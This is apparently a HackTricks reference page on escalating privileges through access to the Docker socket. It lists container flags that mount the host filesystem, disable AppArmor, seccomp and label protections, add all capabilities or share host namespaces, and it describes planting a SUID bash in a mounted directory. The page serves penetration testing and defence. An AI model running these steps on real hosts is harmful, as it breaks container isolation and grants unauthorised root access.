Abusing Docker Socket for Privilege Escalation
Last updated
Last updated
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
There are some occasions were you just have access to the docker socket and you want to use it to escalate privileges. Some actions might be very suspicious and you may want to avoid them, so here you can find different flags that can be useful to escalate privileges:
You can mount different parts of the filesystem in a container running as root and access them. You could also abuse a mount to escalate privileges inside the container.
-v /:/host
-> Mount the host filesystem in the container so you can read the host filesystem.
If you want to feel like you are in the host but being on the container you could disable other defense mechanisms using flags like:
--privileged
--cap-add=ALL
--security-opt apparmor=unconfined
--security-opt seccomp=unconfined
-security-opt label:disable
--pid=host
--userns=host
--uts=host
--cgroupns=host
**--device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined
** -> This is similar to the previous method, but here we are mounting the device disk. Then, inside the container run mount /dev/sda1 /mnt
and you can access the host filesystem in /mnt
Run fdisk -l
in the host to find the </dev/sda1>
device to mount
-v /tmp:/host
-> If for some reason you can just mount some directory from the host and you have access inside the host. Mount it and create a /bin/bash
with suid in the mounted directory so you can execute it from the host and escalate to root.
--privileged
-> With this flag you remove all the isolation from the container. Check techniques to escape from privileged containers as root.
--cap-add=<CAPABILITY/ALL> [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable]
-> To escalate abusing capabilities, grant that capability to the container and disable other protection methods that may prevent the exploit to work.
In this page we have discussed ways to escalate privileges using docker flags, you can find ways to abuse these methods using curl command in the page:
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)